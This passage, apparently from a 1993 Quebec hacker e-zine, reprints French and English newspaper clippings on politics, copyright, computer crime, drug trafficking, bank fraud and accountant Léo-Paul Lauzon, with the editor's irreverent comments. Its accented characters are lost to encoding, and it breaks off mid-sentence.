"propagande"? Souvenez-vous du titre: la mari de moins en moins
"in". Un, l'article ne traite pas vraiment le sujet sous cet
angle, et deux, si nous fumons de la dope, c'est certainement pas
pour tre "in", n'est-ce-pas? ;-) ]
Leeched from LE SOLEIL - Mardi 7 septembre 1993
UN "VOEU D'ANNIVERSAIRE" DE CAMPBELL
RAVIVE LE PASS CRIMINEL D'UN
PARTISAN POLITIQUE
par Anne St-Pierre
Baie Comeau- Le premier parchemin d'honneur pour souligner les 75
ans de vie d'un partisan politique, mis par la premire ministre
Kim Campbell, sme la controverse sur la Cte-Nord. Un citoyen de
Sept-Iles demande au Parti Conservateur de retirer le certificat
remis
M. Thodore Leblanc, parce qu'il a dj
t condamn pour
homicide involontaire. (...)
M. Albert Dolan a vivement dnonc ce geste parce que le
jubilaire a fonc en automobile, en 1972, sur une foule de 8000
personnes qui manifestaient l'emprisonnement de trois chefs
politiques syndicaux, devant le palais de justice de Sept-Iles.
M. Leblanc a t condamn
4 ans d'emprisonnement pour avoir tu
un individu et bless 35 autres, dont M. Dolan, qui doit encore
composer avec les consquences du geste de l'homme.
Pour les conservateurs, il n'est aucunement question de
retirer la mention de M. Leblanc, "parce qu'il a (...) reu le
pardon du gouverneur gnral" (...).
- 30 -
(Blitz- Un autre exemple de ces escrocs qu'on appelle des
politiciens. Un militant conservateur de bonne souche fonce dans
une foule de 8000 personnes, en tue un et en blesse des dizaines.
Condamn pour homicide involontaire (comment a, involontaire?),
il est grai par le lieutenant-gouverneur, et reoit maintenant
un parchemin d'honneur... C'est a la politique: j'espre
seulement que vous ne mangiez pas pendant que vous lisiez ceci,
sinon, je m'excuse pour les hauts-le-coeur...)
Leeched from LE SOLEIL - Jeudi 16 septembre 1993
L'INFORMATIQUE COMPROMET LA NOTION DU DROIT D'AUTEUR
par Anne-Marie Voisard
Le droit d'auteur, dans une socit de l'informatisation est
une notion dpasse. Le texte "en tant que tel n'appartient
personne". Il est "libre" au mme titre que les individus qui
composent cette socit, pour peu qu'elle soit dmocratique.
Ces ides,
tout le moins innovatrices, ressortent de la
troisime et dernire journe du colloque de l'Association
internationale de bibliologie, tenu
Sherbrooke. Quelque cent
chercheurs, reprsentant une dizaine de pays, ont pris part
ces
assises organises en collaboration avec le Groupe de recherche
sur l'dition littraire au Qubec (GRELIQ) et l'Association
qubcoise pour l'tude de l'imprim.
Trois confrenciers sur quatre, hier aprs-midi, ont abord
cette question du droit d'auteur. (...)
Devant l'ordinateur
[Ces chercheurs],
commencer par Bill Winder, de
l'universit de la Colombie-Britannique, qui a ouvert le dbat,
se sont tous appuys sur les progrs de l'informatique.
"L'automatisation de l'industrie transforme la tche de l'ouvrier
en la rapprochant de celle de l'crivain", a dit M. Winder,
ajoutant que "devant l'cran de l'ordinateur, nous devenons tous
crivains et diteurs".
Le confrencier faisait rfrence ici au "texte
lectronique", par opposition au livre que Paul Durand
[professeur
Lige] a dcrit comme "ce rectangle de papier reli
gauche". Tout de suite aprs, Guy Plachaud, matre de
confrence en Information/Communication
l'universit du Mans, a
ouvert son expos en affirmant que "l'crit (du moins en thorie)
n'est plus li
son support, il est duplicable et accessible
distance". C'est justement ce qui conduit, selon lui,
la remise
en question des droits d'auteur.
D'autres problmes, comme la ncessit de rpondre
de
nouveaux besoins, naissent toutefois du dveloppement de ces
technologies. Or, M. Pelachaud estime qu'il n'appartient pas aux
mathmaticiens d'y rpondre. Il est de ceux qui croient, en
effet, que l'enseignement de l'informatique est l'affaire des
professeurs de franais. "Nous sommes entrs, a-t-il dit, dans
une phase d'industrialisation du travail intellectuel". (...)
A la suite de ses collgues, Franois Richaudeau [PDG des
ditions Retz
Paris] s'est dit "contre le droit d'auteur". En
tant qu'diteur, il a prfr toutefois "descendre de ces
hauteurs" o se situe le dbat sur l'intelligence artificielle.
- 30 -
[Blitz- Une fois de plus, NPC est drlement en avance sur la
plupart des courants de pense. Les chercheurs commencent
peine
se questionner sur l'dition lectronique et les droits
d'auteur, alors que nous, a fait dj
un an qu'on dit que les
textes n'appartiennent plus qu'au lecteur...]
Leeched from LA PRESSE - Jeudi 16 septembre 1993
L'ORDINATEUR, UNE ARME INVISIBLE QUI PEUT TUER
par Lisa Binsse
La gurilla informatique constitue une menace importante
pour les pays industrialiss et reprsente, uniquement aux tats-
Unis, des cots de l'ordre de 150
250 milliards de dollars US
ou quatre
huit millions d'emplois, selon M. Winn Schwartau,
auteur et expert reconnu dans ce domaine.
M. Schwartau pense que les systmes informatiques qui
envahissent le quotidien des individus et des corporations
rendent vulnrables les pays industrialiss qui ne sont pas
prpars
faire face aux aspects ngatifs de cette nouvelle
culture.
Invit
la confrence sur la gurilla informatique que
tenait hier pour la premire fois au Canada le National Computer
Security Association, M. Schwartau a expliqu que la gurilla
informatique (l'espionnage industriel, la fraude informatique, la
fraude tlphonique, l'coute tlphonique, la fraude aux cartes
de crdit, le vol de documents, les erreurs informatiques,
l'interfrence lectro-magntique, etc.) vise trois niveaux:
personnel, corporatif et global.
Tuer par ordinateur
"Quelqu'un peut vous tuer avec un ordinateur. Tout
coup,
votre nom disparat des fichiers centraux. Vous n'existez plus.
Comment, demande-t-il, allez-vous faire la preuve que vous
existez toujours?"
M. Schwartau a parl en entrevue d'une guerre entre deux
factions rivales de jeunes,
New York et au Texas, qui se sont
livrs une bataille informatique par le biais du tlphone. Un
des deux groupes a trouv le moyen de modifier les donnes
tlphoniques (noms, numros, comptes) du groupe rival. Il
ressort, dit-il, que les ordinateurs de grandes socits
tlphoniques amricaines ne sont pas adquatement protgs.
Il a aussi fait tat d'employs du fisc amricain qui, pour
une somme d'argent, modifiaient les rapports d'impt de
contribuables amricains. "La corruption, a fonctionne!".
"Aux tats-Unis, il est possible lgalement d'obtenir, pour
une somme minime, toute l'information essentielle concernant la
vie d'un citoyen. Il est mme possible, illgalement, d'obtenir
des informations criminelles du fichier central du FBI. Ces 18
000 ordinateurs ne sont pas protgs et celui qui veut peut
facilement trouver la faille, l'ouverture qui lui en donnera
l'accs".
Des armes invisibles
Qui peut vouloir cet accs? Essentiellement n'importe qui,
a-t-il rpondu, du jeune voisin aux terroristes du World Trade
Center,
New York. Les armes informatiques sont invisibles et
passives. "Vous ne vous rendez mme pas compte que vous avez t
touchs!" Elles sont tratres et efficaces.
M. Schwartau a parl de sept armes dont les erreurs
informatiques intentionnelles, le "reniflage" sur un rseau, les
interceptions cellulaires et l'interfrence lectromagntique.
Pour faire face
ce flau, M. Schwartau propose une
politique d'information nationale qui stipulerait, notamment, que
l'information est un actif qui devrait tre protg. Cette
politique dfinirait ce qu'est l'information,
qui elle
appartient -"
qui appartient votre nom"- quelle en est sa
valeur, est-elle confidentielle, secrte ou prive.
"Nous devons, a-t-il conclu, dterminer des critres
rationnels pour protger cet actif. Il ne s'agit pas seulement de
construire notre avenir, il faut aussi le protger".
- 30 -
[Blitz- Bon. Foncirement, Schwartau n'est pas un mauvais bougre.
Mme qu'il vient d'crire un roman un peu cyberpunk et plutt
bien foutu, intitul TERMINAL COMPROMISE, disponible gratuitement
sur Internet (6 megs). Mais, mme si on l'avait pay ce jour-l
pour faire le singe savant, je trouve qu'il en met un peu trop.
Les hackers ont le dos large, mais quand mme. Force nous est
donne d'avouer qu'il est contre le fait que l'information soit
disponible
tous, en gnral. Le facho typique, quoi...]
Leeched from LE JOURNAL DE QUBEC - Samedi 18 septembre 1993
LE TRAFIC DE DROGUE IRA EN AUGMENTANT
par Michel Auger
Le trafic de l'hrone, de la cocane et du hachisch devrait
augmenter de faon sensible d'ici deux ans et Montral continuera
d'tre l'une des portes d'entre principales de la drogue tant
pour le Canada que pour les tats-Unis. C'est ce que croit le
nouveau patron de la brigade des stupfiants de la Gendarmerie
Royale du Canada
Montral.
Dans une entrevue, l'inspecteur Val Zanin a expliqu que son
quipe d'experts tait trs loin de manquer de travail. "Le
personnel de la section des stupfiants a connu une augmentation
cette anne (...)", explique le policier de 48 ans.
Citant le dernier rapport de la police fdrale sur les
tendances du trafic pour cette anne et l'an prochain, M. Zanin a
dit que les cargaisons importantes allaient srement transiter
par Montral. (...)
Le rapport de la GRC prvoit que la consommation de crack et
de cocane va augmenter. La "coke", d'aprs la GRC, va demeurer
d'une grande puret
Montral, comme
Qubec. On parle
actuellement d'une drogue pure
60%. Malgr des saisies de
drogues majeures depuis un an, la police fdrale n'a constat
aucun changement dans les prix de revente au march noir. "Si les
prix ne bougent pas, c'est peut-tre un signe que la drogue est
toujours facilement disponible pour les consommateurs", a dit M.
Zanin. (...)
- 30 -
[Blitz- Bon! Voil
le genre d'article que nous vous demandions,
messieurs de la GRC! Qualit du produit, quantit, stabilit des
prix: tout y est. Seul dsappointement, en lisant l'article: vous
n'avez pas l'air d'tre
veille de la gagner, cette fameuse
guerre contre la drogue! Notons en passant que, dans le fond,
c'est pas si grave que a, puisque a vous a permis de connatre
"une augmentation cette anne" au niveau du "personnel de la
section des stupfiants". Ceci dit, entendre la GRC dire qu'ils
formulent des hypothses sur les prix, c'est comme entendre les
membres de l'OPEP spculer sur le prix du ptrole: tu ne stipule
pas sur quelque chose o tu as le parfait contrle, mon gars! ]
Leeched from THE MIRROR - 16 septembre 1993
INAPPROPRIATE BEHAVIOR
par Josh Bezonsky
(...) Someone who won't be doing any cross-border shopping for a
while is Roger Benjamin, whose recent arrest ended a saga of
cross-Canada con-artistry that is more compelling than most made-
for-TV-movies. Benjamin, if that is his real name, stole the
applications of prospective law students first at UBC, then at
McGill and at Queen's, and used them to get letters of acceptance
to the three schools. His scam was simple: He changed all the
adresses to his own so that the schools would send their
responses directly to him. He enrolled at UBC under the name
Richard Pearson. There, he stole another student's car and
comitted credit card frauds before vanishing. In the 1991-92
academic year, he pulled off the same scam at McGill using the
name Rick Jones. He stole more applications and attempted to cash
numerous cheques which he doctored so that they were made payable
to McGill University AND Rick Jones. When McGill finally caught
on in January 1992, "Jones" managed to elude both the MUC Police
and McGill security (who literally had him in their grasp). He
then scammed Queen's last year, assuming a third student's
identity. Officials at Queen's smelled a rat when they did a
records check this January and alerted the Kingston authorities,
who managed to bring the impostor to justice. He is now serving
out the rest of a one-year prison sentence at Quinte Regional
detention Centre in Napanee, Ontario. If only he had just written
his LSATs like all the other aspiring law students, with his
cunning he would've eventually made a better attorney than
Matlock.
- 30 -
Leeched from PC MAGAZINE - 12 octobre 1993
INSIDE COMPUTER CRIME
par Angela Gunn
The electronic frontier is disappearing at the speed of a
fast modem link. While most computer users live in the relative
safety of LAN settlements ans standalone PC enclaves, computer
criminals and vigilantes still roam the terrain.
"Approching Zero" will doubtlessly be compared with "The
Hacker Crackdown", another excellent book about the underside of
cyberspace. Cowritten by an American journalist and a British
expert, the book documents a myriad of serious crimes - security
breaches, credit card fraud, illegal tempering, robbery, and
espionage. The book focuses on international crime, first
illustrating the ease with which basic larceny can be commited
and then documenting the effects that such a crime can create. It
reports cases in which hacking and rogue programming turned ugly
and even describes a case of international spying that ended with
a suspicious death. Chillingly, much of the crime discussed was
facilitated by overenthusiastic computer users who used their
knowledge either thoughtlessly or callously, or by MIS managers
who allowed a motley group of users to gain access to machines in
their workplaces.
It's a great read, but the incidents described point to a
frightening conclusion: Phone phreaks, hackers, and virus writers
shape our world, even if they don't yet own it. A virus written
to extort money from users of a shareware program wiped out ten
years of AIDS research data in Italy. And the credit ratings and
credit card numbers of any citizen are available to computer
users not yet old enough to drive.
The authors have done a masterful job of pulling their
sprawling tale into a coherent whole. "Approching Zero" leaves an
ominous quiet, where you know something's going on but not what
it is. The book offers few solutions and less hope, but its
message may make you reconsider your own vulnerability on the
wide frontier.
Approching Zero, by Paul Mungo and Bryan Clough, $22.
Random House; 1-800-733-3000, ISBN: 679-40938-6.
- 30 -
Leeched from LE JOURNAL DE QUEBEC - Mardi 28 septembre 1993
LA RECETTE A RAL...
par Jean -V. Dufresne
Le vendeur de grosses Chrysler, qui buvait des quantits
industrielles de sirop Wampole's pour ne pas perdre la voix,
avait pour son dire en terminant ses discours: "Vous avez essay
les rouges, vous avez essay les bleus, vous n'avez plus rien
perdre. Essayez-nous, pis dehors les chiens pas d'mdailles!"
Vous aurez reconnu l'unique, l'innnarrable et irremplacable
Ral Caouette qui, au Qubec, remporta 26 siges
la Chambre des
communes en 1962. Personne ne l'avait vu venir, celui-l
, et
Diefenbaker dut se contenter d'un gouvernement minoritaire, et ne
s'en est plus relev.
Les "chiens pas d'mdailles", c'est pas joli, mais plus la
campagne avance, et
mesure que se confirment mutuellement les
sondages, je me revois fonant dans la nuit abitibienne, dans la
Chrysler
Ral, les deux pieds sur la caisse de sirop Wampole's.
"Une campagne, c'est dur pour les cordes vocales", disait-il. Les
yeux verrouills sur la ligne blanche, d'une main il s'envoyait
une rasade de sirop, de l'autre il tenait le volant. Pour dire
vrai, il conduisait avec deux doigts. Quatre-vingt-dix milles
l'heure, parce qu'Amos, c'est loin, mais avec un power steering,
les virages, a se prend tout seul.
Du haut du paradis des concessionnaires Chrysler, je me
demande ce que Ral pense de la campagne d'aujourd'hui. J'ai
comme l'impression, tout fdraliste qu'il tait, qu'il ne
verrait pas d'un mauvais oeil Lucien Bouchard en train de rpter
la rengaine abitibienne aux lecteurs: "Vous avez essay les
bleus, vous avez essay les rouges, vous n'avez plus rien
perdre. Essayez-nous, pis dehors les chiens pas d'mdailles!".
Parce qu'
mon sens, ce qui se passe au Qubec, si les
sondages se maintiennent, n'est rien de moins qu'une furieuse
vague de protestations crditiste qui dferle sur la province
Ral. Et sur les Prairies de Preston Manning. Si Caouette tait
la tte du Bloc Qubcois, ce serait un vritable raz-de-mare.
Au plan national, le scrutin du 25 octobre sera un dsastre.
Dans l'Ouest canadien, Preston Manning exploite le ressentiment
populaire avec la mme ferveur que William "Bible" Bill Aberhart
dans l'Alberta des annes quarante.
Tandis que Kim Campbell soutient qu'une campagne c'est trop
srieux pour discuter de scurit sociale, Chrtien, de son ct,
n'ose pas nous expliquer (en est-il seulement capable?) comment
il abolira la TPS, une bagatelle de 15 milliards $, ni par quoi
il la remplacera.
Alors,
quoi servent les lections? Essayer autre chose,
disait Caouette. Et c'est ce qui est en train d'arriver. Au
Qubec, Jean Charest monte dans l'arne avec trois semaines de
retard et s'apprte
dnoncer le Bloc en bchant sur les
souverainistes, comme s'il fallait tre pquiste pour tre
coeur des vieux partis. La preuve, c'est qu'il n'y a pas de
sparatistes dans l'Ouest, et l'coeurement est aussi sulfureux.
Un petit prognostic sur le Qubec: les libraux qui partent
de si bas ne peuvent qu'amliorer leur position le 25 octobre, et
le Bloc qubcois domine de si haut qu'il ne peut qu'en perdre un
peu. Mais voil
, si Jean Charest part en peur contre les
nationalistes en les traitant de "marionnettes
Parizeau",
Lucien Bouchard peut dj
sabler le champagne.
Avec une bouteille de sirop Wampole's dans le seau
glace.
- 30 -
[Blitz- K'en-to! Le retour de Ral Caouette! Vous vous
souviendrez peut-tre que j'avais dj
voqu, dans l'dito de
NPC 5, je crois, le retour de la pense crditiste. D'ailleurs,
au moment ou j'cris ces lignes, j'entends Jean Chrtien
la
tl qui parle lui aussi de la performance de Ral Caouette. Just
to remind you that you heard it here first, folks!]
Leeched from LA PRESSE - Vendredi 24 septembre 1993
DES BANQUES QUI AGISSENT EN PLEINE ILLGALIT
par Jacques Benoit
La Bentley International Bank et la Banque d'change
Manhattan (Canada), toutes deux actives
Montral, la Canadian
Credit Bank, de Toronto, ainsi que la Churchill International
Bank et la Dominion Overseas Bank, de Vancouver... ont toutes en
commun d'tre des banques-crans (shell banks, en anglais).
C'est-
-dire des tablissements qui n'ont souvent pour tout actif
qu'un permis d'exercice dlivr quelque part dans les Antilles ou
encore dans quelque le de la Rgion Asie-Pacifique.
Et qui tous, bien qu'ils ne soient pas autoriss
faire des
affaires au Canada, en font, violant ainsi ouvertement la Loi sur
les banques, expliquait hier le vice-prsident, scurit, de
l'Association des banquiers canadiens, M. Michael Ballard, dans
une causerie
l'Association de gestion de trsorerie de Montral
(on en devient membre
condition d'appartenir
une entreprise
ou
une institution financire dont les revenus et l'actif
atteignent 100 millions et plus).
Signe de la gravit du problme: pas plus tard qu'en juillet
dernier, le Bureau du surintendant des institutions financires
publiait une liste de 250 socits de ce type susceptibles d'tre
actives au Canada. Et toutes, comme le souligne M. Ballard,
portant des noms ronflants, capables de confondre les plus malins
tant ils ressemblent
ceux d'authentiques institutions: Allied
Bank & Trust Limited, Allied Investment Bank, Applebank Capital
Corporation, Aurum Financial Services, Banco de Asia, etc.
Exerant dans bien des cas leurs activits par le moyen de
casiers postaux, elles offriront par exemple - c'est un cas
typique - de prendre des dpts
des taux particulirement
allchants, "par exemple 15 p. cent". Taux qu'elles paieront un
temps, en puisant dans les nouveaux dpts qu'elles auront
recueilli par le mme moyen... jusqu'au jour o elles
s'vanouiront dans la nature!
L'Argent qui n'existe pas
Autre fraude
ses dires courante: l'argent fantme, ou
inexistant, mieux connu sous ses noms anglais (ghost money, arab
oil dollars, brokered funds, below market loan deals, etc.) Les
victimes peuvent tre dans ce cas des banques ou d'autres
institutions financires, des clients de ces dernires, des
entreprises, etc., dit-il.
Un type de transaction frquent: le virement,
partir de
l'tranger, "par exemple de Hong-Kong", d'un montant trs lev,
"10 millions, 50 millions", sur un compte bancaire d'un
tablissement canadien, la victime ayant
verser un petit
pourcentage, "
quelque chose comme 1/4 d'un dixime d'un pour
cent", pour s'assurer que la transaction sera faite. La
commission verse, toute l'affaire tombe
l'eau.
Il existe une rgle d'or pour viter de tomber dans de tels
panneaux, a dit M. Ballard, qui a galement trait de
blanchissage d'argent, et c'est de bien connatre non seulement
les clients avec qui on traite, mais aussi les clients des
clients. "Si la transaction semble trop bonne pour tre vraie,
elle risque de ne pas l'tre", a-t-il dit, soulignant galement
qu'il faut se mfier comme de la peste des transactions dont
l'une des parties demande qu'elles soient conclues uniquement par
tlphone, tlcopieur ou tlex. Car, ajoute-t-il en substance,
quand de fortes sommes sont en jeu, il est normal que les gens
traitent, du moins en partie, de vive voix et face
face.
- 30 -
[Blitz- Les charognards se dvorent entre eux. Les voleurs se
font mutuellement les poches. Rjouissons-nous, mes frres! Ce
type de fraude n'est pas prs de nous viser, bien que, quelque
part, les banques refilent au client (c'est-
-dire nous) les
dividendes ngatiFs que leurs conneries leur causent. L'appt du
gain perd parfois les institutions financires, mais ils ne
manquent pas de nous entraner dans leur perte, parasites sociaux
qu'elles sont.
Depuis quand l'conomie proccupe-t-elle Blitzkreig, me
direz-vous? Depuis que je me suis dcouvert un hros, tout
fait
improbable, tout
fait gnial: un comptable agr! Vous m'auriez
dit il y a un an qu'un fucking comptable serait un jour une de
mes idoles, je vous aurait revir aussi sec. Et pourtant! Mais il
faut dire que des mecs comme Lo-Paul Lauzon ne courent pas les
rues. Read on, dear friend...]
Leeched from V.O. (VIE OUVRIERE) - Septembre 1993
LO-PAUL LAUZON
UN COMPTABLE QUI REDRESSE LA COLONNE
par Daniel S. Legault
Quand Lauzon s'est pench sur le cas Tl-Mtropole, qui
montrait ses fonds de poches vides au CRTC, son analyse a montr
des profits importants. De plus, cette tude, commande par le
syndicat de la place, a videmment transform les ngociations!
Mme Mario Bertrand, le prsident de TM, n'a pu tre trop
critique face au travail de Lauzon, se contentant d'un "Lauzon a
retenu d'autres hypothses, d'autres postulats".
La comptabilit n'est pas neutre
Enfant d'un quartier populaire, Lauzon sait trs bien que
les gens ne sont pas tous dupes de l'apparente "neutralit" des
rapports financiers des grandes entreprises: "dans les classes
populaires, les gens ont toujours souponn l'existence d'autres
livres". La comptabilit, telle qu'on la connat, est tout sauf
objective.
"La comptabilit est beaucoup plus prs des sciences
occultes que des sciences exactes. Dpendamment des normes
utilises, un bnfice peut facilement varier du simple au
double, ou on peut transformer un bnfice en perte..." Dans un
de ses livres, Lo-Paul Lauzon affirme que la profession
comptable est en partie responsable de la crise de 1929,
cause
d'artifices et de manipulations comptables.
"En 1993, le Canada est le seul pays au monde dont les
normes comptables, qui ont force de loi, sont dictes par les
comptables eux-mmes. C'est comme si c'tait le Barreau qui
faisait les lois civiles et criminelles. Ca affecte tout le monde
en socit, il faut que a relve du gouvernement. Mme les
tats-Unis, en 1973, ont relev le American Institute of
Certified Public Accountants de cette fonction en disant que a
manquait d'objectivit. Au Canada, ce sont encore les comptables
agrs qui font les normes. Mais ils ne sont pas neutres! Ils
sont dpendants et tributaires des entreprises. C'est vident
qu'ils ne feront pas des normes pour dplaire
leurs clients. Le
Comit des normes comptables de l'ICCA est form de 10 personnes
provenant des bureaux de comptables et de 10 personnes provenant
des grandes entreprises. Vrificateurs et vrifis qui
s'asseoient ensemble pour formuler des normes comptables! C'est
d'un illogisme... Les normes comptables au Canada sont donc, dans
les faits, formules par des dirigeants d'entreprise qui
engagent, paient et congdient leur vrificateur. Je ne blme pas
les bureaux d'experts-comptables: moi-mme si j'tais chez Price-
Waterhouse, je ne voudrais pas perdre mes clients!"
Les comptables sont appels
manipuler des grosses sommes.
"L'conomie et la comptabilit sont trs voisins. La comptabilit
s'occupe plus de micro-conomie. Mais aujourd'hui, il y a
plusieurs entreprises aussi grosses que des pays. Prenez les
ventes annuelles de General Motors, IBM ou EXXON, c'est plus gros
que le PNB de bien des pays. Les dcisions de ces gens-l
ont
souvent plus d'impact que celles d'un ministre".
David v\s Price-Waterhouse
"Un de mes problmes c'est que je travaille avec des groupes
qui ont peu de ressources, peu de moyens. Prenons un exemple.
L'an dernier, pour faire une tude sur les ptes et papiers,
Greenpeace Canada m'a donn $5000. Ca ne paye mme pas le salaire
d'un stagiaire. Pour faire la contrepartie d'tudes faites par un
cabinet comme Price-Waterhouse, avec mon petit $5000 et mon petit
stagiaire, on ne fait pas le poids".
"Les groupes socio-conomiques n'ont pas tous les mmes
moyens", dplore Lauzon, qui constate un dsquilibre malsain des
forces, dans lequel il se sent bien petit. "Le patronat fait
beaucoup de lobbying, et beaucoup d'idologie".
"Il y a une vingtaine d'organisations patronales. Rcemment,
dans la fonction publique, on a dit aux syndicats: "Il y a trop
de duplication". Oui, c'est vrai, mais il faudrait que le
patronat nous envoie un message clair! Les Chambres de commerce,
le Conseil du Patronat, l'Association des manufacturiers
canadiens, le Conseil des gens d'affaires, la Fdration
canadienne des entreprises, etc. J'en ai compt au moins une
vingtaine. Ca cote un bras
chaque entreprise. Pourquoi autant
d'associations patronales? Pour faire plus de lobby".
Et les mdias n'en sont souvent que des courroies de
transmission. "Les mdias d'ici n'ont pas les moyens de faire du
journalisme d'enqute. Ils n'ont pas les moyens financiers de
faire des contre-analyses ou de dcortiquer une tude du Conseil
du Patronat".
"Le bnfice d'une entreprise, c'est
une plus-value collective"
"Le secteur priv demande des coupures dans les soins de
sant. Pourtant le cot des produits pharmaceutiques est plus
lev que celui de la rmunration des mdecins. Les compagnies
pharmaceutiques font des profits exorbitants, pour ne pas dire
indcents. Ca cote une fortune
notre collectivit, et a a un
impact considrable sur nos dficits gouvernementaux. On pourrait
les mettre au pas. C'est quasiment du monopole, protg par les
lois C-91 et C-22. Les compagnies pharmaceutiques amricaines et
canadiennes font tellement de lobbying qu'aucun politicien ne
veut les mettre au pas. Je trouve a d'une lchet
incommensurable. C'est nous qui payons les salaires exorbitants
de cette industrie, deux fois plus levs que ceux du secteur
public. Je crois qu'on pourrait fixer un prix raliste aux
produits pharmaceutiques et aller chercher ainsi, facilement, 3
ou 4 milliards $ par anne (soit 10% du dficit annuel
canadien!)".
"Je ne suis pas contre le secteur priv. Mais c'est comme si
ils n'taient responsables de rien. On a pris toutes sortes de
moyens pour les aider
crer plus de richesse. Moins d'impts,
de l'aide gouvernementale, des socits d'appui comme la Caisse
de dpt, la SDI, etc. Ils n'ont pas livr la marchandise."
Lauzon considre qu'en 1986,
l'poque o la Caisse de dpt
avait le contrle effectif de Provigo, le tout tait bien dirig,
"par Antoine Turmel et Pierre Lessard (aujourd'hui chez Mtro-
Richelieu)". On a privatis, on a donn a
Bertin Nadeau, que
Lauzon appelle un "petit aventurier". "Cette aventure-l
nous a
cot un milliard $ (soit, au Qubec, environ $150 par personne).
Comme celle de Steinberg!"
"Ca en prend des gens d'affaires, mais des entrepreneurs qui
ne sont pas vreux et opportunistes. Le premier objectif du
secteur priv c'est de crer de la richesse. Pas de se
l'approprier aux dpens des autres. Prenez les salaires des
dirigeants canadiens ou amricains, c'est connu, c'est 10 fois
plus lev que celui des dirigeants allemands ou japonais".
"J'entendais rcemment Dominique Vachon, l'conomiste en
chef de la Banque Nationale dire "Le pays est en faillite!". Ca
c'est totalement alarmiste. Mme Moody's le dit que notre
endettement est modr. Mais regardons une banque comme la Banque
Nationale: elle a t pratiquement de toutes les faillites. Dans
l'immobilier, la Olympia & York, BCE Development, Campeau,
Malenfant, etc.: les banques canadiennes ont dilapid
peu prs
50 milliards en 5 ans, dans l'immobilier. Ca c'est de l'pargne
interne qui n'existe plus. Elles sont en partie responsables de
nos emprunts
l'tranger. Mettons qu'elles sont imposes
30%.
50 milliards de pertes, c'est dductible comme dpense. Ils
auront donc droit
des recouvrements d'impt de 15 milliards
(soit plus de 10% annuellement du dficit canadien, ou $150 par
personne)! Collectivement, c'est ce qu'on perd."
"Les banques chialent beaucoup contre l'intervention
gouvernementale. Pourtant, sans elle, a ferait longtemps
qu'elles auraient t manges par la City Corp, la Chase
Manhattan Bank, la Banque de Hong-Kong, et la Banque nationale de
Paris. Ca c'tait du
protectionnisme. Deuximement, une bonne
partie du profit des banques vient des abris fiscaux: ils vendent
plein de RER."
Les gens du secteur priv me font rire quand ils disent que
les syndicats sont dconnects du secteur priv. Bertin Nadeau et
Michel Gaucher sont bien plus dconnects. Ils arrivent au bureau
avec leur chauffeur priv, s'installent au 30 de la Place Ville-
Marie. Le soir ils sont au St-James Club et au Club St-Denis ou
au Beaver Club. Ils vont jouer au golf au Royal Montreal Golf
Club. Ca habite Le Sanctuaire ou le Circle Road
Westmount. Ca a
son chalet au lac Memphrmagog. Qui est-ce qui est plus
dconnect?!?"
ENSEIGNER LA COMPTABILIT
Lauzon se dfinit d'abord comme un prof de comptabilit, ce
qu'il fait depuis 1973,
l'Universit du Qubec
Montral. Les
sciences comptables apparaissent facilement comme un ghetto,
austre, ultra-spcialis. Lauzon prne quant
lui une formation
multi-disciplinaire pour ses tudiants-es, pour leur permettre
(les obliger) d'largir leur conception de la comptabilit. Avec
Lauzon comme professeur, on ne s'en tiendra pas
la
comptabilisation des impts reports ou des caisses de retraite,
il demandera, par exemple, un travail sur la place des femmes
dans les grandes entreprises. "Mais j'essaie aussi de faire
comprendre l'importance du modle comptable pour la collectivit
et pour chacun des individus, combien a cot l'aventure
Unigesco-Provigo, combien les grandes compagnies payent en
impts, combien elles reoivent en subventions."
A priori, ceux qui arrivent en comptabilit se disent: je
vais faire des petites tudes tranquilles, une petite job
tranquille, assez bien paye. Ce n'est pas l
qu'on trouve les
gens les plus critiques dans la socit."
Lauzon professeur ne laisse pas indiffrent. "C'est certain
qu'enseigner en conomie ou en sciences politiques, il y aurait
plus d'tudiants qui me suivraient. Parce que tu peux en avoir
des stagiaires: ils se cherchent tous un emploi d't. Mais moi
je leur dis "quand vous faites quelque chose, il faut avoir la
foi, il faut communier avec ce que vous faites". Celui qui fait
a va me sortir quelque chose de beaucoup plus novateur et
intressant que celui qui est "sur le neutre", "sur la switch"
tout l't. C'est sr qu'avec des finissants qui ne pensent qu'
"performer" dans des bureaux de comptables, on n'est pas sur la
mme longueur d'ondes. Moi je pense qu'au moins la moiti de mes
tudiants me dtestent, par idologie, par convictions, etc. Mais
je ne les blme pas. Moi-mme quand je suis arriv ici, je
n'tais absolument pas politis."
Lauzon lui-mme alimente beaucoup les journaux. Est-ce le
rle du dpartement des sciences comptables? "D'aprs moi, on ne
le fait pas assez. Moi j'ai une job en or, je jouis d'une totale
libert de pense et de parole. Le recteur lui-mme ne pourrait
pas m'arrter. Je fais 6 heures de cours. Le reste du temps je
peux faire de la recherche fondamentale pour faire avancer la
science, ou tre critique et observer, objectivement, dans la
limite de mes comptences, ce qui se passe dans la socit, et
prendre position. Y a des comptables 100 fois plus comptents que
moi, qui ont 100 fois plus de bonnes ides que moi. Mais quand
vous travaillez chez Bombardier ou
la Commission des valeurs
immobilires, vous ne pouvez pas dire n'importe quoi". Lauzon
soutient qu'il faut que l'universit profite de son indpendance:
"elle n'y a aucun mrite, c'est son devoir".
PORTRAIT DE LO-PAUL LAUZON, PRATIQUANT,
DANS CENTRE-SUD.
Lo-Paul lauzon a t lev, et demeure encore, dans le
Faubourg
Melasse, le quartier Centre-Sud de Montral. (...)
"C'est sr que c'est plus payant et plus prestigieux
(comparativement
ce que je fais) d'tre le "conseiller" d'un
ministre. Ca a ferait plaisir
ma mre! Elle me dit souvent:
"Lo,
ton ge, avec toutes tes tudes, tu n'as jamais t
manger au St-James-Club?!?" Plus srieusement, Lo-Paul Lauzon
dit qu'il se sent plus
l'aise avec le monde de gauche. "C'est
drle
dire, mais je crois plus
la sincrit de la gauche, aux
valeurs que ce monde-l
vhicule..."
"J'tais un lgume vivant!"
"Je n'avais pas les moyens d'tudier le jour: j'ai fait mes
cours le soir, en travaillant le jour. Je travaillais dans un
bureau comptable. Ca ne dbordait donc pas de la comptabilit."
Et il regrette de ne pas avoir eu une meilleure culture gnrale.
Depuis un certain temps, il prend les bouches doubles.
"J'tais pratiquement un lgume vivant! J'tais un simple
petit comptable, sans conscience sociale. Il faut dire, pour
comprendre a, qu'il y a tout un plaisir intellectuel
matriser
le modle comptable..."
"J'ai t chercher un MBA (une matrise en administration
d'affaires)
l'cole des Hautes tudes Commerciales,
temps
plein. C'est l
que j'ai t en contact pour la premire fois
avec des psychologues, des architectes, des politicologues, des
conomistes. (...) Les premiers travaux d'quipe, je m'en
souviens: je damnais (...)... J'tais rvolt. J'aurais voulu
qu'on prenne des dcisions d'affaires sans tenir compte de
